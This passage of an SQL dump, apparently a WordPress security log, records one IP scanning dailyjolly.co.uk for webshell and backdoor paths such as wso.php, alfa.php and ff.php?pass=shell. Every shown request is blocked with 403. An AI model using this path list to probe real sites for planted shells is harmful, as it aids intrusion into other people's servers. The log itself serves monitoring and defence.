Safari\\/537.36\"}','GAaKM0w1F4H3eR7qtULBb8h5',0,1673950321.6999,204,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/5.php','','{\"1\":\"python-requests\\/2.28.1\"}','OhSCDuGY7dZBgImq2e5LVwvz',0,1673950327.7876,191,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/IXR/hunt.php','','{\"1\":\"python-requests\\/2.28.1\"}','loVP4QvIispxcSKEe3qGnrtB',0,1673950327.7906,200,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','CXhATJaDjsFofzKduMx0n1VU',0,1673950328.1222,194,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','nQrH14V0O5xkqePaoUhRAwfz',0,1673950328.7687,252,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/old-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','cYUm6grkPnsQH79oz15iD2ep',0,1673950329.6891,210,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','JCsXVDz0AiefNRndrPGB98E3',0,1673950330.3917,198,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/IXR/hunt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','mjuVQJYCltynoqBaK9wPGzsh',0,1673950331.0141,166,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LJeHfDdF1sRqZk2y4rxiYlCB',0,1673950331.7752,221,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/991176.php','','{\"1\":\"python-requests\\/2.28.1\"}','6vh7WLNnbKBaT9r35tgXimkq',0,1673950443.9597,233,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ayMGo7TlUN29nXgKzVJ4c0ut',0,1673950446.1647,214,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','Tfu243mFnEcsO0PGRLdpI9hW',0,1673950457.9151,186,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','y4URE26K0J9ZPACGjhztguxQ',0,1673950458.0696,191,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"python-requests\\/2.28.1\"}','pkKwefCS1gz3NYjvrTo2WObJ',0,1673950458.1316,185,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/8.php','','{\"1\":\"python-requests\\/2.28.1\"}','vRD0ndfWjGrYhIpMe46PZNu5',0,1673950458.2273,224,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','OvpV6orf1mUEHzuc24Kj3ZJL',0,1673950458.4340,189,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','GrloIPUYKViu7npaR283Wcmx',0,1673950458.9004,183,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Zw4m1JGCpN2HfOASnDQkPLFa',0,1673950458.8967,214,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Bg9qjAdiSOC0QKoHNYPfTVnE',0,1673950459.0831,173,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/h.php','','{\"1\":\"python-requests\\/2.28.1\"}','tB401I2aMxNlLHGVOwSUFEi3',0,1673950461.5612,220,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8ZefSyzskgvdmML6PD75JT2a',0,1673950463.4554,189,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/gank.php.PhP','','{\"1\":\"python-requests\\/2.28.1\"}','sfvB8PHbdr0R6cV9jJ3zwoE4',0,1673950470.7374,191,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/gank.php.PhP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','36axnJHLwecRmSVNXod0DsIv',0,1673950471.5895,199,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','gpjP5V2Zqli9d6LCzeNBb0DW',0,1673950501.0878,209,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','0fQR8GMcKEDX4O7jl1BY9IHy',0,1673950501.3431,200,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','I0B896JFXbvj4qGKcxYt7Uzd',0,1673950501.5151,205,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/swm.php','','{\"1\":\"python-requests\\/2.28.1\"}','jIRVfoFZEC1sWazSi7PbnNx6',0,1673950501.5710,219,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','uocewBgIl3mKTD0fLYRbUtVQ',0,1673950501.8348,182,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1EC5yPRX2ltkeYaBOzTcKNMI',0,1673950502.0228,171,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','sv8z4EpiDR7jQVgmSFZLMkXc',0,1673950502.1039,174,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Rv4ZOUGXMcfFNpDIwxqCAuLt',0,1673950502.1225,220,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','CpslLTbgZ2OoBxYkq5cvzUw8',0,1673950505.4064,230,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"python-requests\\/2.28.1\"}','UBoEWpfM34iygxTj1qXHvIN8',0,1673950505.9873,222,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','NGoHSdBZzmnEFeaxbXwsKAyC',0,1673950505.9797,242,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','Vh1u0oSgdi2aZyL8bnCWmpRU',0,1673950506.0571,238,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xltavrat.php','','{\"1\":\"python-requests\\/2.28.1\"}','mnqOR9kyFlNeC6JpuK1tPzQ2',0,1673950506.0768,264,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/.cgi/cache/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zogCSwdRjGIb1mvT4OlW9Yt7',0,1673950506.1590,232,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Ls12ckSN7gVKR305d6iI8PDU',0,1673950506.4833,192,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4Q8jYPBUqJZbKkXISE2Mrpel',0,1673950506.4813,204,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hf9OS4MoKV62dlJANruXQGmt',0,1673950506.5118,207,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','B3RQpkjFalbZDCsJm16i2zt0',0,1673950506.6252,204,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','HluPF5Q0ncK9CbB6eyLT3Zij',0,1673950506.9662,286,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','GiUYsoOukNeR1ywIV89D50rz',0,1673950506.9970,288,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wso112233.php','','{\"1\":\"python-requests\\/2.28.1\"}','kdngFvauiTlyBNpXs4RH5O6z',0,1673950506.9985,355,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ok.php','','{\"1\":\"python-requests\\/2.28.1\"}','B47Pk0jTcDnYWCfIhdJmpgyl',0,1673950507.0122,373,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','KWJpVumQgD2cI3LBE0ynTjC4',0,1673950507.0133,377,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/.tmb/cache/shz.php','','{\"1\":\"python-requests\\/2.28.1\"}','6GScyanLIdv80jDtU2mswOHx',0,1673950507.0334,383,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','kqdoUDNi7xQp8mZEebJAntMy',0,1673950507.0871,339,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/l.php','','{\"1\":\"python-requests\\/2.28.1\"}','KlhN4qYRGBZSvOVy5m90U7Cw',0,1673950507.1178,386,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mari.php','','{\"1\":\"python-requests\\/2.28.1\"}','LYQJKuC69cVeWqI4PDsrO8l3',0,1673950507.0915,417,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.28.1\"}','X94fPECjBdr1UkglpLxVyAZN',0,1673950507.1596,351,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','EWS9TCaJvUMfn4VgBOc1NH0d',0,1673950507.1363,379,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','BJltLYogVWhfUsXZKmCI218e',0,1673950507.1118,429,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','IfmWzGHCZFskJuAwMQDR7l91',0,1673950507.6649,279,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZXt1CrsFMLJwzO80a4RNgIvx',0,1673950507.7271,277,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','STUzgKBYd9Nji7shRAXEmQI8',0,1673950507.6470,365,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/.tmb/cache/shz.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VsItixW04DXohOw3Nj8fZqlF',0,1673950507.7206,294,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','gXWG3dUEJNi9e5tBO42zMvpw',0,1673950507.7505,331,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6Ie1yMPiD7zTaZWEjcxJsXFV',0,1673950507.6928,472,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','psbruohe12WMTUwN5VacJdCy',0,1673950507.7938,397,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','qTBwXmrL4z2s6cG3NE8efZoI',0,1673950507.7811,418,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','v0OAIQLJiWGfjc16ZtydKRMk',0,1673950507.7944,405,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','K4Bx7iocD1Hbj9Ie65qZYpMl',0,1673950507.7864,426,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','WMvFz7dwPu631EcelCyJthg2',0,1673950507.8556,433,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','3mxyQeO9vjzBCgGDWdI2qMwH',0,1673950507.8727,462,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xx.php','','{\"1\":\"python-requests\\/2.28.1\"}','Cag4UGFetBMuPvEpcLrY52Sz',0,1673950545.2040,340,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','saPS1AvUqeDVH9TmbBcFzu2d',0,1673950545.2224,332,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','GytdcuwWe3nHLOBSRlkI1bPV',0,1673950545.2481,329,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','nwUSz9fpQhYm1ADOLyvj5a0s',0,1673950545.2799,341,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/small.php','','{\"1\":\"python-requests\\/2.28.1\"}','uQCF1vdrJ9YUZISKtbOwXDkl',0,1673950545.2935,327,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/content.php','','{\"1\":\"python-requests\\/2.28.1\"}','9ItByKL6eOabFnlXDZoVgGsS',0,1673950545.3132,318,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','yIbuwreCAO1qzV2olGadcYF8',0,1673950545.3072,334,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"python-requests\\/2.28.1\"}','8rOEeTAkN93msocxyvQZfJD5',0,1673950545.3128,336,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZkJ0u8TNOvbLQamgfjyVKsF5',0,1673950545.8861,222,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6C4MKvDwluFs1cfbLZJX3tqP',0,1673950545.9421,225,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','X5ZzToBqNMAd4shk9HifpJlS',0,1673950546.0111,198,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','B2SgnJOENw08DkIeyciX3Z6H',0,1673950546.0268,214,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Uk32ZvhSfjPamFOMnGdgKBY7',0,1673950546.2664,202,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','y4h21mLkUcSrX3spVOg7zeJQ',0,1673950546.4312,192,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6RQ7JYvzyaitIO9D0No45VP3',0,1673950546.4312,213,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tSEDv2KrP14TlpHOm5BaCZbI',0,1673950546.4421,213,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/jindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','Cg4aOQF2GXLJnNqlfykwt71v',0,1673950558.5136,229,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Gu1FDvnyTqc6iC95PjaQpWZH',0,1673950559.5115,176,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','FJqIl9Y1pcyST0MCPLm6Re2n',0,1673950565.5740,269,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/2index.php','','{\"1\":\"python-requests\\/2.28.1\"}','Iw2NQEWDOb4vLM8tFzcSZorp',0,1673950565.5655,279,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ff.php?pass=shell','','{\"1\":\"python-requests\\/2.28.1\"}','aLn1lWZRUfJ9qpTtQme6VoDd',0,1673950565.5840,293,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','AY0Ku4F5W3LqjBhgodVeca7b',0,1673950565.6252,289,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.28.1\"}','XMRIz2uPts5SG8UV6DeYTn4p',0,1673950565.6166,306,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/export.php','','{\"1\":\"python-requests\\/2.28.1\"}','dBZRgqzjlK12aDyk8GcH0Oom',0,1673950565.6530,297,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','Th7Ygyt9bEnVdNsiQ5oMCzxa',0,1673950565.6742,286,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','XrIFf2bkpuqAonKyPGaCv4eM',0,1673950565.6319,330,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"python-requests\\/2.28.1\"}','gtjsFITSVRhcwX64zA0QqUkL',0,1673950565.8529,224,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ff.php?pass=shell','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','CNZnc1HG24R5awSpVxAXJq03',0,1673950566.1500,283,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','pDg2YZPnhXTLjCv8I3ldxUVQ',0,1673950566.1947,264,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','luK7dQmCpajAZPyzX5fYTFb9',0,1673950566.2067,262,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Zz3mlUhda4HoCYxRDvq5Pw0K',0,1673950566.1285,341,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','QOIGhXUl7t2JL1n8Mrd90eKz',0,1673950566.1618,308,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ho93Vs7l2mzpaWnLkR1Ij64g',0,1673950566.1218,358,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','QdRtZwCGMxTOfekX2oqg5bsu',0,1673950566.3067,241,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 